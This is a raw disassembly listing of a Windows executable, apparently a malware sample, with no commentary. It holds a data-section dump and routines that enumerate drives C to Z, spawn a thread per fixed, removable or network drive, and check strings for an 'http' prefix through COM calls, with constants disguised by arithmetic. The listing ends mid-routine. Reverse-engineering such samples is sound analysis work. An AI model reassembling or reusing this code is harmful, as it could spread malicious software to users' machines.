dd 435F935h, 25361836h, 33362A36h, 45364036h, 56364A36h
dd 61365C36h, 72366636h, 7D367836h, 8E368236h, 99369436h
dd 0AA369E36h, 0B536B036h, 0C636BA36h, 0D136CC36h, 0E236D636h
dd 0ED36E836h, 0FE36F236h, 9370436h, 1A370E37h, 25372037h
dd 36372A37h, 41373C37h, 52374637h, 5D375837h, 6E376237h
dd 79377437h, 8A377E37h, 95379037h, 0A6379A37h, 0B137AC37h
dd 0C537B637h, 0D037CB37h, 0ED37E737h, 1B380737h, 43383938h
dd 50384938h, 68385C38h, 0A3387A38h, 0BD38A938h, 0D38C438h
dd 25391439h, 35392D39h, 0B8399B39h, 0DA39BD39h, 0FA39E739h
dd 233A1939h, 3F3A2C3Ah, 5C3A563Ah, 723A693Ah, 0A93A963Ah
dd 0D43AAF3Ah, 4A3B073Ah, 753B5E3Bh, 0A33B7C3Bh, 0D13BCA3Bh
dd 853C303Bh, 9A3C903Ch, 0C03CA63Ch, 0D63CCB3Ch, 103CF23Ch
dd 323D1B3Dh, 573D383Dh, 0BE3D853Dh, 0DF3DCC3Dh, 0FA3DE53Dh
dd 163E0F3Dh, 343E2D3Eh, 4F3E493Eh, 8D3E6F3Eh, 0AA3E943Eh
dd 0BC3EB23Eh, 53EE43Eh, 203F133Fh, 333F273Fh, 4B3F3E3Fh
dd 593F503Fh, 6B3F663Fh, 7D3F703Fh, 883F833Fh, 0A43F973Fh
dd 0DA3FBD3Fh, 0EF3FE83Fh, 70003Fh, 20000h, 27301900h
dd 3F302D30h, 5D305630h, 7F306D30h, 9C309630h, 0F830AD30h
dd 0A310530h, 20311331h, 2B312531h, 40313331h, 4B314631h
dd 60315731h, 6D316731h, 88317231h, 0A3319331h, 0B531AE31h
dd 0E731D031h, 0FD31F831h, 21320431h, 5E323F32h, 6E326732h
dd 79327432h, 90328332h, 9E329532h, 0B032AB32h, 0C132B532h
dd 0CC32C732h, 0E032D132h, 0EB32E632h, 0B330432h, 49331F33h
dd 5B334F33h, 7F337133h, 98339133h, 0C033A333h, 0F433E533h
dd 17340A33h, 4A344434h, 70345534h, 8C348634h, 0A4349E34h
dd 0B534B034h, 0D634C434h, 734FB34h, 54354735h, 76356735h
dd 0B3358C35h, 0C535C035h, 1235CB35h, 39361C36h, 5A364036h
dd 74366336h, 95368C36h, 0B136A736h, 14370D36h, 32372C37h
dd 57374837h, 7C376D37h, 0A1379237h, 0BB37B437h, 0B37C137h
dd 29381538h, 48383B38h, 73385D38h, 8A388138h, 0BB38B538h
dd 0D738CE38h, 38F338h, 0E390539h, 20391B39h, 31392539h
dd 3C393739h, 4D394139h, 58395339h, 69395D39h, 74396F39h
dd 85397939h, 90398B39h, 0A4399539h, 0AF39AA39h, 0E539DF39h
dd 193A0139h, 483A2F3Ah, 693A4F3Ah, 0AA3A703Ah, 0C53AB83Ah
dd 0E33AD63Ah, 103AEB3Ah, 233B1E3Bh, 353B2F3Bh, 683B633Bh
dd 8F3B813Bh, 0AF3BA03Bh, 0C23BBD3Bh, 0DE3BCF3Bh, 2A3BEE3Bh
dd 493C303Ch, 743C633Ch, 9A3C873Ch, 0AF3CA03Ch, 0CB3CB53Ch
dd 0DE3CD73Ch, 0F23CED3Ch, 0C3D053Ch, 293D1C3Dh, 3F3D383Dh
dd 0AD3D763Dh, 0F73DC63Dh, 193DFE3Dh, 283E1F3Eh, 493E313Eh
dd 643E503Eh, 743E6D3Eh, 943E7B3Eh, 0B23E9C3Eh, 0D63EC93Eh
dd 0EE3EDC3Eh, 73EF43Eh, 1E3F0D3Fh, 393F333Fh, 623F573Fh
dd 0A23F693Fh, 0AD3FA73Fh, 0B93FB33Fh, 0EE3FE53Fh, 3FF73Fh
dd 800000h, 26C00h, 19300C00h, 42303530h, 73305E30h, 96308430h
dd 0ED30E030h, 48312A30h, 0A1315531h, 0D431AE31h, 0F431DB31h
dd 0F320831h, 46323032h, 97324C32h, 0BB329D32h, 1A32CF32h
dd 2C332133h, 85334133h, 9F339933h, 0C133B633h, 0E033DA33h
dd 333F733h, 52341E34h, 79345934h, 90348434h, 0B0349634h
dd 0ED34E734h, 19350B34h, 31351F35h, 57353835h, 70356735h
dd 8B357F35h, 0A4359635h, 0B635AF35h, 0DD35D335h, 0EF35E335h
dd 18360C35h, 30362A36h, 54364636h, 7A365F36h, 90368936h
dd 0AB369636h, 0BF36B736h, 0CB36C436h, 0F536EA36h, 1336FC36h
dd 2B371C37h, 58373D37h, 69376337h, 7C377637h, 90378337h
dd 0F037B437h, 77386137h, 97387E38h, 0B7389E38h, 0EF38BE38h
dd 138FC38h, 17390A39h, 21391C39h, 33392D39h, 3D393839h
dd 4F394939h, 59395439h, 6B396539h, 75397039h, 87398139h
dd 91398C39h, 0A3399D39h, 0AD39A839h, 0BF39B939h, 0C939C439h
dd 0DB39D539h, 0E539E039h, 0F739F139h, 139FC39h, 133A0D3Ah
dd 1D3A183Ah, 2F3A293Ah, 393A343Ah, 4B3A453Ah, 553A503Ah
dd 673A613Ah, 713A6C3Ah, 833A7D3Ah, 8D3A883Ah, 9F3A993Ah
dd 0A93AA43Ah, 0BB3AB53Ah, 0C53AC03Ah, 0D73AD13Ah, 0E13ADC3Ah
dd 0F33AED3Ah, 0FD3AF83Ah, 0F3B093Ah, 193B143Bh, 2B3B253Bh
dd 353B303Bh, 473B413Bh, 513B4C3Bh, 633B5D3Bh, 6D3B683Bh
dd 7F3B793Bh, 893B843Bh, 9B3B953Bh, 0A53BA03Bh, 0B73BB13Bh
dd 0C13BBC3Bh, 0D33BCD3Bh, 0DD3BD83Bh, 0F23BEC3Bh, 33BF73Bh
dd 133C0C3Ch, 1E3C193Ch, 353C283Ch, 433C3A3Ch, 553C503Ch
dd 663C5A3Ch, 713C6C3Ch, 823C763Ch, 8D3C883Ch, 9E3C923Ch
dd 0A93CA43Ch, 0BA3CAE3Ch, 0C53CC03Ch, 0D93CCA3Ch, 0E43CDF3Ch
dd 73CF63Ch, 303D193Dh, 433D373Dh, 613D543Dh, 6F3D663Dh
dd 813D7C3Dh, 923D863Dh, 9D3D983Dh, 0AE3DA23Dh, 0B93DB43Dh
dd 0CD3DBE3Dh, 0D83DD33Dh, 0E73DE23Dh, 3DF93Dh, 223E0C3Eh
dd 3D3E353Eh, 573E453Eh, 733E6C3Eh, 8A3E833Eh, 0E43EAF3Eh
dd 0FC3EEA3Eh, 103F073Eh, 253F1D3Fh, 363F2F3Fh, 6D3F463Fh
dd 893F763Fh, 0AF3FA83Fh, 0E83FCE3Fh, 0FC3FED3Fh, 90003Fh
dd 23400h, 1E300400h, 3C302D30h, 51304C30h, 81306030h
dd 0A8308C30h, 0C730C230h, 430D630h, 1D310B31h, 3A312C31h
dd 6A315231h, 94317D31h, 0BF31A731h, 2231E931h, 8C325532h
dd 0D732AB32h
dd 2132E532h, 67332B33h, 81337533h, 8C338733h, 9D339133h
dd 0A833A333h, 0B933AD33h, 0C433BF33h, 0D533C933h, 0E033DB33h
dd 0F133E533h, 0FC33F733h, 0D340133h, 18341334h, 29341D34h
dd 34342F34h, 45343934h, 50344B34h, 61345534h, 6C346734h
dd 7D347134h, 88348334h, 99348D34h, 0A4349F34h, 0B534A934h
dd 0C034BB34h, 0D134C534h, 0DC34D734h, 0ED34E134h, 0F834F334h
dd 934FD34h, 14350F35h, 25351935h, 30352B35h, 41353535h
dd 4C354735h, 5D355135h, 68356335h, 79356D35h, 84357F35h
dd 95358935h, 0A0359B35h, 0B135A535h, 0BC35B735h, 0CD35C135h
dd 0D835D335h, 0E935DD35h, 0F435EF35h, 535F935h, 10360B36h
dd 21361536h, 2C362736h, 3D363136h, 48364336h, 59364D36h
dd 64365F36h, 75366936h, 80367B36h, 91368536h, 9C369736h
dd 0AD36A136h, 0B836B336h, 0C936BD36h, 0D436CF36h, 0E536D936h
dd 0F036EB36h, 136F536h, 0C370737h, 1D371137h, 28372337h
dd 39372D37h, 44373F37h, 55374937h, 60375B37h, 71376537h
dd 7C377737h, 8D378137h, 98379337h, 0A9379D37h, 0B437AF37h
dd 0C537B937h, 0D037CB37h, 0E137D537h, 0EC37E737h, 0FD37F137h
dd 8380337h, 1F380D38h, 2A382538h, 4C384438h, 58385238h
dd 7C386338h, 9B388238h, 0B438A238h, 0C138BA38h, 0EC38C738h
dd 0F38F338h, 20391939h, 36392D39h, 47393C39h, 80394D39h
dd 97398A39h, 0C939A939h, 0FD39DF39h, 4D3A4739h, 6C3A663Ah
dd 803A773Ah, 1C3AE93Ah, 2D3B223Bh, 443B3D3Bh, 5D3B563Bh
dd 4F3C493Bh, 803C7A3Ch, 0AA3C943Ch, 0BE3CB83Ch, 833D7C3Ch
dd 0E63DAF3Dh, 0F43DEE3Dh, 453E3E3Dh, 5A3E533Eh, 7C3E6C3Eh
dd 0A03E8F3Eh, 0B53EA63Eh, 403F1E3Eh, 3F8B3Fh, 0A00000h
dd 15000h, 52300F00h, 7F307930h, 0EA30DD30h, 1F30EF30h
dd 39313031h, 78314931h, 0A4318431h, 0C531AB31h, 0E231CB31h
dd 331E931h, 39323232h, 6D326432h, 0BF327B32h, 0E732CC32h
dd 3B32FC32h, 4E334833h, 0CF33BF33h, 0E633D633h, 833EC33h
dd 20341034h, 56343234h, 6A345C34h, 81347134h, 0B9349634h
dd 0D434C434h, 32352C34h, 0A4356035h, 0DF35D935h, 57365035h
dd 7A367436h, 0B8369F36h, 0EB36D336h, 0A370436h, 84371837h
dd 0C137BB37h, 54384737h, 0AE386138h, 63395338h, 86397939h
dd 0A739A039h, 0C239BC39h, 0DF39D839h, 223A1139h, 733A373Ah
dd 903A7A3Ah, 0A83A973Ah, 0B73AB13Ah, 0E63ADA3Ah, 23AF53Ah
dd 243B1E3Bh, 3D3B353Bh, 5B3B553Bh, 873B6C3Bh, 0B33B8D3Bh
dd 0FD3BE83Bh, 123C033Bh, 4A3C1B3Ch, 7A3C5A3Ch, 0A93C903Ch
dd 0C43CBD3Ch, 0E93CD33Ch, 163D0A3Ch, 313D1F3Dh, 513D3E3Dh
dd 703D5A3Dh, 813D7B3Dh, 0DB3DB03Dh, 0FF3DEC3Dh, 183E133Dh
dd 3E3E2B3Eh, 5D3E453Eh, 923E6D3Eh, 0CA3E993Eh, 0FF3ED73Eh
dd 193F053Eh, 353F2F3Fh, 843F4B3Fh, 0AB3F973Fh, 0C23FB13Fh
dd 0D23FC93Fh, 0E03FD93Fh, 0FC3FE73Fh, 0B0003Fh, 6C00h
dd 1E300C00h, 7D307430h, 0BD30B830h, 0E130DA30h, 130FA30h
dd 21311A31h, 6A316331h, 0B1317131h, 0C931B631h, 0F31D131h
dd 40321532h, 86326C32h, 0A0329532h, 0C432BA32h, 632E732h
dd 9A332433h, 0AA33A233h, 0B333B233h, 0C23BBA3Bh, 0BE3BCA3Bh
dd 0D63CCA3Ch, 0EE3CE23Ch, 63CFA3Ch, 1E3D123Dh, 363D2A3Dh
dd 120003Dh, 4400h, 7C300000h, 18321431h, 20321C32h, 28322432h
dd 34322C32h, 3C323832h, 44324032h, 4C324832h, 58325032h
dd 60325C32h, 68326432h, 70326C32h, 78327432h, 80367C36h
dd 368436h, 1400000h, 2000h, 98319400h, 0AC319C31h, 0B431B031h
dd 0BC31B831h, 0C431C031h, 31C831h, 7Dh dup(0)
dd 0D21F7300h, 45h, 1702800h, 3 dup(100h), 1703400h, 1703800h
dd 1703C00h, 716B6B00h, 2E5F7876h, 6C6C64h, 6C7700h, 1704000h
dd 0
dd 694C5F00h, 69614D62h, 30406Eh, 466Ah dup(0)
_data ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 0003A000)
; Virtual size : 0000AD40 ( 44352.)
; Section size in file : 0000AD40 ( 44352.)
; Offset to raw data for section: 0003A000
; Flags 60000020: Text Executable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 43A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_43A006: ; DATA XREF: sub_43A026+A�o
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_43A025
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_43A025: ; CODE XREF: .text:0043A014�j
retn
; =============== S U B R O U T I N E =======================================
sub_43A026 proc near ; CODE XREF: .text:0043A14E�p
; .text:0043A17C�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_43A006
push large dword ptr fs:0
mov large fs:0, esp
loc_43A043: ; CODE XREF: sub_43A026+44�j
; sub_43A026+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43A072
cmp esi, [esp+1Ch+arg_4]
jz short loc_43A072
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43A043
call dword ptr [ebx+esi*4+8]
jmp short loc_43A043
; ---------------------------------------------------------------------------
loc_43A072: ; CODE XREF: sub_43A026+2A�j
; sub_43A026+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43A026 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A080 proc near ; CODE XREF: .text:0043A141�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_43A098
push [ebp+arg_0]
call sub_444CD4
loc_43A098: ; DATA XREF: sub_43A080+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43A080 endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43A175
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43A0D3: ; CODE XREF: .text:0043A16C�j
cmp esi, 0FFFFFFFFh
jz loc_43A184
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43A163
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword_44B034, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword_44B038, eax
mov eax, [edx+4]
mov dword_44B03C, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_44B040
mov esi, dword_44B038
rep movsd
lea edi, dword_44B040
mov dword_44B038, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43A163
js short loc_43A171
mov edi, [ebx+8]
push ebx
call sub_43A080
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43A026
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43A163: ; CODE XREF: .text:0043A0E4�j
; .text:0043A139�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43A0D3
; ---------------------------------------------------------------------------
loc_43A171: ; CODE XREF: .text:0043A13B�j
xor eax, eax
jmp short loc_43A18E
; ---------------------------------------------------------------------------
loc_43A175: ; CODE XREF: .text:0043A0B8�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43A026
add esp, 0Ch
loc_43A184: ; CODE XREF: .text:0043A0D6�j
push 0Bh
call sub_444D1C
add esp, 4
loc_43A18E: ; CODE XREF: .text:0043A173�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43A1A7
call sub_43A1C3
loc_43A1A7: ; CODE XREF: .text:0043A1A0�j
call sub_444C5F
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, off_44B000
call eax ; sub_444C34
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A1C3 proc near ; CODE XREF: .text:0043A1A2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_444CEC
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_444CEC
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_444CEC
mov [ebp+var_C], eax
push (offset aWr+2)
push [ebp+var_8]
call sub_444CE0
mov dword_44B008, eax
push offset aWr ; "wr"
push [ebp+var_4]
call sub_444CE0
mov dword_44B004, eax
push offset aWr ; "wr"
push [ebp+var_C]
call sub_444CE0
add esp, 30h
mov dword_44B00C, eax
mov edi, dword_44B004
or edi, edi
jz short loc_43A23C
push 0
push edi
call sub_444D28
add esp, 8
loc_43A23C: ; CODE XREF: sub_43A1C3+6C�j
mov edi, dword_44B00C
or edi, edi
jz short loc_43A256
push 0
push edi
call sub_444D28
add esp, 8
call sub_43A25C
loc_43A256: ; CODE XREF: sub_43A1C3+81�j
pop edi
leave
retn
sub_43A1C3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A25C proc near ; CODE XREF: sub_43A1C3+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_444CC8
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43A294
; ---------------------------------------------------------------------------
loc_43A278: ; CODE XREF: sub_43A25C+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_43A280
inc [ebp+var_C]
loc_43A280: ; CODE XREF: sub_43A25C+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43A294: ; CODE XREF: sub_43A25C+1A�j
cmp byte ptr [ebx], 0
jnz short loc_43A278
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_444D10
pop ecx
mov [ebp+var_8], eax
mov dword_44B010, eax
cmp [ebp+var_8], 0
jnz short loc_43A2C2
xor eax, eax
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2C2: ; CODE XREF: sub_43A25C+60�j
mov ebx, [ebp+var_10]
jmp short loc_43A30C
; ---------------------------------------------------------------------------
loc_43A2C7: ; CODE XREF: sub_43A25C+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_43A306
push [ebp+var_4]
call sub_444D10
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_43A2F4
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2F4: ; CODE XREF: sub_43A25C+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_444D34
add esp, 8
add [ebp+var_8], 4
loc_43A306: ; CODE XREF: sub_43A25C+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43A30C: ; CODE XREF: sub_43A25C+69�j
cmp byte ptr [ebx], 0
jnz short loc_43A2C7
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_43A31F: ; CODE XREF: sub_43A25C+64�j
; sub_43A25C+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A25C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43A324 proc near ; DATA XREF: sub_43F328+223�o
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_43A33D
; ---------------------------------------------------------------------------
loc_43A334: ; CODE XREF: sub_43A324+1C�j
and ds:dword_44A790[esi*4], 0
inc esi
loc_43A33D: ; CODE XREF: sub_43A324+E�j
cmp esi, 5Ah
jbe short loc_43A334
loc_43A342: ; CODE XREF: sub_43A324+1AA�j
mov edi, 43h
jmp loc_43A4AA
; ---------------------------------------------------------------------------
loc_43A34C: ; CODE XREF: sub_43A324+189�j
movsx eax, word_44B0F0
sub eax, 5
push eax
call ds:dword_44A630
push offset word_44C7D2
call sub_43DF30
push edi
push eax
lea ebx, [ebp+var_E]
push ebx
call ds:dword_44A634
add esp, 14h
cmp ds:dword_44A790[edi*4], 0
jz short loc_43A3C2
movsx eax, word_44B0A4
add eax, dword_44B104
sub eax, 7
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ds:dword_44A790[edi*4]
call ds:dword_44A64C ; GetExitCodeThread
cmp [ebp+var_14], 103h
jz short loc_43A3C2
push ds:dword_44A790[edi*4]
call ds:dword_449650 ; CloseHandle
and ds:dword_44A790[edi*4], 0
loc_43A3C2: ; CODE XREF: sub_43A324+5A�j
; sub_43A324+87�j
lea eax, [ebp+var_E]
push eax
call ds:dword_44A664 ; GetDriveTypeA
mov [ebp+var_4], eax
cmp eax, 3
jz short loc_43A402
cmp eax, 4
jz short loc_43A402
cmp eax, 2
jz short loc_43A402
cmp ds:dword_44A790[edi*4], 0
jz loc_43A4A9
movsx ebx, word_44B0A4
sub ebx, 5
mov ds:dword_447630[edi*4], ebx
jmp loc_43A4A9
; ---------------------------------------------------------------------------
loc_43A402: ; CODE XREF: sub_43A324+AE�j
; sub_43A324+B3�j ...
push 1
call ds:dword_446000 ; SetErrorMode
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_E]
push eax
call ds:dword_4470D4 ; GetDiskFreeSpaceA
movsx ebx, word_44B0F4
add ebx, dword_44B09C
sub ebx, 3
cmp eax, ebx
jnz short loc_43A45B
cmp ds:dword_44A790[edi*4], 0
jz short loc_43A4A9
movsx ebx, word_44B13C
add ebx, dword_44B0A8
sub ebx, 0Bh
mov ds:dword_447630[edi*4], ebx
jmp short loc_43A4A9
; ---------------------------------------------------------------------------
loc_43A45B: ; CODE XREF: sub_43A324+112�j
cmp ds:dword_44A790[edi*4], 0
jnz short loc_43A4A9
mov ds:dword_447630[edi*4], edi
lea eax, [ebp+var_28]
push eax
mov eax, dword_44B0F8
sub eax, 7
push eax
lea ebx, ds:447630h[edi*4]
push ebx
push offset sub_441CEA
movsx ebx, word_44B118
movsx edx, word_44B0F0
add ebx, edx
sub ebx, 0Eh
push ebx
push 0
call ds:dword_44AB90 ; CreateThread
mov ds:dword_44A790[edi*4], eax
loc_43A4A9: ; CODE XREF: sub_43A324+C2�j
; sub_43A324+D9�j ...
inc edi
loc_43A4AA: ; CODE XREF: sub_43A324+23�j
cmp edi, 5Ah
jbe loc_43A34C
movsx eax, word_44B0B4
movsx edx, word_44B108
add eax, edx
sub eax, 0Ah
push eax
call ds:dword_44A630
pop ecx
jmp loc_43A342
sub_43A324 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_43A4DA proc near ; CODE XREF: sub_43F328+20C�p
push 2
call sub_43C2E5
push 0
call sub_43C2E5
add esp, 8
retn
sub_43A4DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A4EC proc near ; CODE XREF: sub_4407DD+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call ds:dword_448248 ; VirtualAlloc
pop ebp
retn
sub_43A4EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A503 proc near ; CODE XREF: sub_43CBA8+1F�p
var_71F0E = byte ptr -71F0Eh
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50E9F = byte ptr -50E9Fh
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_444C70
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call ds:dword_445038
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
push dword_44B0EC
push [ebp+arg_0]
call ds:dword_448254
mov ebx, eax
mov eax, dword_44B0C4
movsx edx, word_44B0A0
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_43B2DA
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push offset dword_44C900
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B144
movsx edx, word_44B120
add eax, edx
sub eax, 8
cmp ebx, eax
jnz loc_43B2DA
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
movsx eax, word_44B118
movsx edx, word_44B0E0
add eax, edx
sub eax, 11h
cmp ebx, eax
jnz loc_43B2CE
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_43C65F
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call ds:dword_44ABA0
cmp [ebp+var_40E57], 68h
jnz short loc_43A622
cmp [ebp+var_40E56], 74h
jnz short loc_43A622
cmp [ebp+var_40E55], 74h
jnz short loc_43A622
cmp [ebp+var_40E54], 70h
jz short loc_43A627
loc_43A622: ; CODE XREF: sub_43A503+102�j
; sub_43A503+10B�j ...
jmp loc_43B2CE
; ---------------------------------------------------------------------------
loc_43A627: ; CODE XREF: sub_43A503+11D�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, dword_44B0B0
movsx edx, word_44B14C
add eax, edx
sub eax, 9
cmp ebx, eax
jz short loc_43A65B
and [ebp+var_30E4C], 0
loc_43A65B: ; CODE XREF: sub_43A503+14F�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, dword_44B144
add eax, dword_44B0D0
cmp ebx, eax
jnz loc_43B2CE
lea eax, [ebp+var_40E6C]
push eax
push offset dword_44C880
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B11C
add eax, dword_44B0FC
sub eax, 5
cmp ebx, eax
jnz loc_43B2C2
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
